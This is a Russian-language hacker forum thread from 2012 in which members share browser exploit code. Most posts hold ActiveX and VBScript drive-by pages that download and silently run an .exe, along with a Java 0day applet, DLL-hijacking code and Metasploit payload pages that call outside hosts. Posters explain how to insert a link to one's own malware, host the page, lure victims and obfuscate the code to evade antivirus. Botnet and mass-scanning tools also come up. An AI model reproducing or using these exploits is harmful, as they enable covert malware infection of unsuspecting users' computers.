Всё что надо для Хакера

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.



Эксплоиты

Сообщений 1 страница 30 из 45

1

Internet Explorer 6, 7, 8
Сам код

</html>
</script>
</body>
<BODY>
<OBJECT ID="DownloaderActiveX1"
WIDTH="0"
HEIGHT="0"
CLASSID="CLSID:c1b7e532-3ecb-4e9e-bb3a-2951ffe67c61"
CODEBASE="http://c6.community.alice.it/download/DownloaderActiveX.cab#Version=1,0,0,1">
<PARAM NAME="propProgressbackground" VALUE="#bccee8">
<PARAM NAME="propTextbackground" VALUE="#f7f8fc">
<PARAM NAME="propBarColor" VALUE="#df0203">
<PARAM NAME="propTextColor" VALUE="#000000">
<PARAM NAME="propWidth" VALUE="0">
<PARAM NAME="propHeight" VALUE="0">
<PARAM NAME="propDownloadUrl" VALUE="LINK HERE"> ---------------------Вместо LINK HERE вставляем ссылку на свой фаил
<PARAM NAME="propPostdownloadAction" VALUE="run">
<PARAM NAME="propInstallCompleteUrl" VALUE="">
<PARAM NAME="propbrowserRedirectUrl" VALUE="">
<PARAM NAME="propVerbose" VALUE="0">
<PARAM NAME="propInterrupt" VALUE="0">
</OBJECT>
</script>
</body>
</html>

+2

2

][bm3 написал(а):

я так понял * данный сплоит загружает зловред и запускает его?

Да точно так.

0

3

Для iE 7 скачивает и запускает фаил

<html>
<head>
<title>IE7 Exploit</title>
</head>
<body>
<script type="text/vbscript">
on error resume next
Set df = document.createElement("object")
df.setAttribute "clas"&"sid", "clsid:BD96C"&"556-65A3-11D0-"&"983A-00C04F"&"C29E36"
str="Microsoft"&"."&"XMLHTTP"
Set x = df.CreateObject(str,"")
var1="Ad"
var2="od"
var3="b."
var4="St"
var5="re"
var6="am"
str1=var1&var2&var3&var4&var5&var6

str5=str1
set S = df.createobject(str5,"")
for count = 0 to 4
S.type = 1
lnk="www.****.ru/Server.exe" --------------------- здесь ставим ссыль без http://
x.Open "G"&"E"&"T",lnk,0
x.Send
set F = df.createobject("Script"&"ing.FileSys"&"temObject" ,"")
if count = 0 then tmp = "c:\windows\temp" else if count = 1 then tmp = "c:\" else if count = 2 then tmp = "c:\temp" else if count = 3 then tmp = "d:\windows\temp" else if count = 4 then tmp = "d:\" end if
fname1= F.BuildPath(tmp,"\server.exe")
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
if err.number = 0 then
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"INSTALL","","open",0
exit for
Kaynak: G-S style
else
Err.Clear
End if
next
</script>
</body>
</html>

Отредактировано nitob (2012-10-18 17:15:39)

+1

4

можно подробнее как его применить? а то ваще не врубаюсь

0

5

Создаеш текстовый документ вставляеш данный код где написано вставить свою ссылку на фаил, ставиш сам фаил заливаеш на хостинг получается типа такова http://raskrutkasaita.taba.ru/fid/ZmlsZ … icture.exe далее текстовый документ меняем на html и заливаем на хостинг, имя можно дать любое ну типа xaker.html и льм трафик на эту страницу, и если есть дыры в браузере то на наш экплоит сработает,(скачает фаил и запустит его на строне жертвы)

0

6

Незабываем что нужно криптовать код. Вобщем есть онлайн сервисы так что пробуем а иначе АВ будет ругатся.

0

7

На данном ресурсе можно всегда найти новые эксплоиты http://packetstormsecurity.org/

+1

8

//
// CVE-2012-XXXX Java 0day
//
// reported here: http://blog.fireeye.com/research/2012/0 … r-yet.html
//
// secret host / ip : ok.aa24.net / 59.120.154.62
//
// regurgitated by jduck
//
// probably a metasploit module soon...
//
package cve2012xxxx;

import java.applet.Applet;
import java.awt.Graphics;
import java.beans.Expression;
import java.beans.Statement;
import java.lang.reflect.Field;
import java.net.URL;
import java.security.*;
import java.security.cert.Certificate;

public class Gondvv extends Applet
{

    public Gondvv()
    {
    }

    public void disableSecurity()
        throws Throwable
    {
        Statement localStatement = new Statement(System.class, "setSecurityManager", new Object[1]);
        Permissions localPermissions = new Permissions();
        localPermissions.add(new AllPermission());
        ProtectionDomain localProtectionDomain = new ProtectionDomain(new CodeSource(new URL("file:///"), new Certificate[0]), localPermissions);
        AccessControlContext localAccessControlContext = new AccessControlContext(new ProtectionDomain[] {
            localProtectionDomain
        });
        SetField(Statement.class, "acc", localStatement, localAccessControlContext);
        localStatement.execute();
    }

    private Class GetClass(String paramString)
        throws Throwable
    {
        Object arrayOfObject[] = new Object[1];
        arrayOfObject[0] = paramString;
        Expression localExpression = new Expression(Class.class, "forName", arrayOfObject);
        localExpression.execute();
        return (Class)localExpression.getValue();
    }

    private void SetField(Class paramClass, String paramString, Object paramObject1, Object paramObject2)
        throws Throwable
    {
        Object arrayOfObject[] = new Object[2];
        arrayOfObject[0] = paramClass;
        arrayOfObject[1] = paramString;
        Expression localExpression = new Expression(GetClass("sun.awt.SunToolkit"), "getField", arrayOfObject);
        localExpression.execute();
        ((Field)localExpression.getValue()).set(paramObject1, paramObject2);
    }

    public void init()
    {
        try
        {
            disableSecurity();
            Process localProcess = null;
            localProcess = Runtime.getRuntime().exec("calc.exe");
            if(localProcess != null);
               localProcess.waitFor();
        }
        catch(Throwable localThrowable)
        {
            localThrowable.printStackTrace();
        }
    }

    public void paint(Graphics paramGraphics)
    {
        paramGraphics.drawString("Loading", 50, 25);
    }

0

9

nitob
Респект молодец такой бы эксплоит под все браузеры  :cool:

0

10

nitob списибо давно хотел разобраться с работой эксплойтов, но если с Metasploit более или менее понятно, то твоя статья у меня требует пояснений! Я постараюсь обьяснить что мне не понятно, а ты ответь если не затруднит. Во первых: Я регистрирую мыло на Yandexs.ru дальше на народ.Ru создаю свою страничку, потом вкидываю туда свой файл (вирь) , сохраняю путь для скачки и извлечения. Далее вставляю его в твой код-эксплоита, криптую html его на сайте, который советует ][bm3.  Вкидую этот  html и файл .exe на хост (к примеру holm.ru) получаю ссылку и эту ссылку я должен впарить жертве, зайдя на которую эксплоит должен пробить его браузер > закачать вирь на комп > и по-тихому установить его. Объясни пожалуйста по-понятнее для тех, кто в "танке", а то это направление в хаке для меня лично это "тёмный лес"!

0

11

][bm3- к чему  эти сплойты , объясните как ими пользоваться ? Я не один такой тупой!

0

12

Нужно что нибудь по круче сейчас мало кто пользуется IE нужно на разные браузеры понаходить

0

13

Anonymous написал(а):

Нужно что нибудь по круче сейчас мало кто пользуется IE нужно на разные браузеры понаходить

Проще не под браузеры а их приложения флеш, ява и т.д, и можно поискать в старых связках эксплоитах, только надо обфусцировать код. Если найду заметки скину на сайт как пишутся эксплоиты.

0

14

Отыскал  ещё пару  полезных сайтов, кому интересно:http://www.exploit-db.com/exploits/15358/    и   http://hpc.name/thread/17859/p1.html

0

15

Отлично, отлично, дело пошло может и раскачаем данный раздел!

0

16

][bm3
Да это не дорка, все файлы в свободном скачивании :)
Ошибся чуть помойму)

0

17

nitob написал(а):

Отлично, отлично, дело пошло может и раскачаем данный раздел!

Ой не уверен,что раскачаем, уж больно быстро они "гады" дыры лотают! Не успеешь понять как всё работает, как уже всё оно и не работает! Сейчас как раз устанавливаю на винду Cygwin для экспериментов и компиляции эксплойтов. Вот ещё интерестная страничка  http://hack-articles.org/item/12

0

18

dedushka написал(а):

Ой не уверен,что раскачаем, уж больно быстро они "гады" дыры лотают! Не успеешь понять как всё работает, как уже всё оно и не работает! Сейчас как раз устанавливаю на винду Cygwin для экспериментов и компиляции эксплойтов. Вот ещё интерестная страничка  http://hack-articles.org/item/12

Ну в данной статье про сервер говорится, для серверов проще использывать BackTrack, И так если скачали,BackTrack запускаем- armitage-Host-MSF scans и пишим ip/24 далее после скана attack - Hail mary . И все если есть уезвимые сервера armitage сам подберет нужный эксплоит и исполнит его, это что касается серверов.

0

19

Нет Я описываю веб способ, так как иногда проверяю сервера (в ознакомительных целях!!!!!!!!) И кстати у меня роутер и нормально работает BackTrack.

0

20

Кстати сейчас испытываю линукс ботнет что здесь выкладывал, в его состав входят 4 эксплоита. Посмотрю пробив, и если что прикручу еще эксплоитов. Дам не всем только провериным узерам, + переписал досбота теперь не нужно поднимать сервер, стучится irc- клиент за командой.

0

21

Microsoft Internet explorer 8 DLL Hijacking (IESHIMS.DLL)
Author: zer0day (MantyCore) (C)
Tested on: XP SP3

PHP код:

#include <windows.h>
#define DLLIMPORT __declspec (dllexport)

DLLIMPORT void IEShims_GetOriginatingThreadId() { MantyCore(); }
DLLIMPORT void IEShims_InDllMainContext() { MantyCore(); }
DLLIMPORT void IEShims_Initialize() { MantyCore(); }
DLLIMPORT void IEShims_SetRedirectRegistryForThread() { MantyCore(); }
DLLIMPORT void IEShims_Uninitialize() { MantyCore(); }

int MantyCore()
{
WinExec("calc", 0);
exit(0);
return 0;
}

+1

22

Уязвимость в Google chrome в версиях 19.0.1084.52 && 19.0.1084.46
(возможно и в предыдущих версиях будет работать)

Vulnreability DLL : metro_driver.dll

PHP код:

// Copyright (c) 2012 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.

#include "base/win/metro.h"

#include "base/string_util.h"

namespace base {
namespace win {

HMODULE GetMetroModule() {
  return GetModuleHandleA("metro_driver.dll"); // hijak :D
}

wchar_t* LocalAllocAndCopyString(const string16& src) {
  size_t dest_size = (src.length() + 1) * sizeof(wchar_t);
  wchar_t* dest = reinterpret_cast<wchar_t*>(LocalAlloc(LPTR, dest_size));
  base::wcslcpy(dest, src.c_str(), dest_size);
  return dest;
}

}  // namespace win
}  // namespace base

+2

23

У меня накопипилось такое эксплоитов что даже проверять все на работоспособность не успеваю))))) Все эксплоиты (заготовки из backtrack)
Названия давать не буду эксплоитам, они вам не к чему вам важен эфект))))) Даю самые простые, как пособие для начинающих писатилей эксплоитов.

0

24

Вот этот один из моих любимых это фейк а значит не палит не один АВ
Вот это не трогайте иначе работать не будет http://www.awingsoft.com/zips/WindsPly.CAB
<html>
<body>
<object classid='clsid:17A54E7D-A9D4-11D8-9552-00E04CB09903'
codebase='http://www.awingsoft.com/zips/WindsPly.CAB'>
<param name="SceneURL" value="Адрес сайта/1.exe#">
<embed type="application/x-awingsoft-winds3d" src="Адрес сайта/1.exe">
</object>

Отредактировано nitob (2012-12-23 08:08:31)

0

25

даю в том виде как он есть
вместо этого http://192.168.1.2:8080/VSOoG4SxcT7iv0j … TELZTo.exe ссылку на ваш домен где лижит exe фаил

<html>









     

     

 

<object

classid='clsid:67A5F8DC-1A4B-4D66-9F24-A704AD929EEE'

   
     
     
 



   

  id='rgHTWbueUuoUIhtEBieiJuJknfQdpoPXveTifaDxDvDkLA'></object>   












<script









 
   

 



language='JavaScript'>



   





 

rgHTWbueUuoUIhtEBieiJuJknfQdpoPXveTifaDxDvDkLA.Init("http://192.168.1.2:8080/VSOoG4SxcT7iv0j/payload/IzhbRwBKnETELZTo.exe",

 

    








   

      "rgHTWbueUuoUIhtEBieiJuJknfQdpoPXveTifaDxDvDkLA");   






 




 



<

Отредактировано nitob (2012-12-23 07:56:34)

0

26

Это все из разряда активных
тут думаю тоже разберетесь (http://192.168.1.2:8080/bEq2L2AvodA/XInX.exe)
<html>
<object classid='clsid:5818813E-D53D-47A5-ABBB-37E2A07056B5' id='aqVWbB' />
</object>
<script language='vbscript'>
aqVWbB.Exec "cmd","/c echo Set Xs = CreateObject(""Microsoft.XMLHTTP"") : Xs.open ""GET"",""http://192.168.1.2:8080/bEq2L2AvodA/XInX.exe"",False : Xs.send: Set Wt = CreateObject(""ADODB.Stream"") : Wt.Open : Wt.Type=1 : Wt.Write Xs.responseBody : Wt.SaveToFile ""C:/Windows/Temp/XInX.exe"",2 : CreateObject(""WScript.Shell"").Run ""C:/Windows/Temp/XInX.exe"",0 >> C:/Windows/Temp/ISAeXL.vbs",1,1,""
setTimeout "x=1", 3000
aqVWbB.Exec "cmd","/c start C:/Windows/Temp/ISAeXL.vbs",1,1,""
<

0

27

nitob написал(а):

Для iE 7 скачивает и запускает фаил

А для IE8, IE9, Mozilla Firefox, Opera есть такой скрипт?

0

28

Еще активный
<html>
    <object id='KEfWyETpDAYbQzhMozqLgNFpRNiTGQCXqgseWwrkCeqUMWcAf' classid='clsid:3356DB7C-58A7-11D4-AA5C-006097314BF8'></object>
    <script language="javascript">
        KEfWyETpDAYbQzhMozqLgNFpRNiTGQCXqgseWwrkCeqUMWcAf.installAppMgr("http://192.168.1.2:8080/ma9gZ5oYt4BcqX0/payload/VvArk.exe");
    <

0

29

Этот посложнее так что поломайте чуток голову))))))
<html>
<head>
<script language='javascript'>
function UYzDEwgBxfAkSITkNWFSJDmqTBPcmGvGNhVuhkSiLuRbdRwnUvnUrScKEdrCXcQZlmsNaPgXZUOqNAWj()
{
nnkbifhoMDEYKizwkcCBpTaRcMNXE.Server = "192.168.1.2";
nnkbifhoMDEYKizwkcCBpTaRcMNXE.Script = "/7cmh1wm?98906081451573012215970060952337";
nnkbifhoMDEYKizwkcCBpTaRcMNXE.Port = 8080;
nnkbifhoMDEYKizwkcCBpTaRcMNXE.MakeHttpRequest("","","../../../Documents and Settings/All Users/Start Menu/Programs/Startup/OIHc8rGpt8zx4apaHpG9wBf6YoRIKpGqqfrLeq2MQ3on7SRu7MJtL.exe","","")
}
</script>
</head>
<body onload='javascript:UYzDEwgBxfAkSITkNWFSJDmqTBPcmGvGNhVuhkSiLuRbdRwnUvnUrScKEdrCXcQZlmsNaPgXZUOqNAWj()'>
<object classid='clsid:E87F6C8E-16C0-11D3-BEF7-009027438003' id=nnkbifhoMDEYKizwkcCBpTaRcMNXE></object>
</body>
</html>

0

30

ЕЩЕ
<html>
    <object id="DownloaderActiveX1" width="0" height="0" classid="CLSID:c1b7e532-3ecb-4e9e-bb3a-2951ffe67c61" codebase="DownloaderActiveX.cab#Version=1,0,0,1">
        <param name="propProgressBackground"  value="#bccee8">
        <param name="propTextBackground"  value="#f7f8fc">
        <param name="propBarColor"  value="#df0203">
        <param name="propTextColor"  value="#000000">
        <param name="propWidth"  value="0">
        <param name="propHeight"  value="0">
        <param name="propDownloadUrl"  value="http://192.168.1.2:8080/xVpUjk1/SciHXZHFr/V.exe">
        <param name="propPostDownloadAction"  value="run">
        <param name="propInstallCompleteUrl"  value="">
        <param name="propBrowserRedirectUrl"  value="">
        <param name="propVerbose"  value="0">
        <param name="propInterrupt"  value="0">
    </OBJECT>
    </html>

0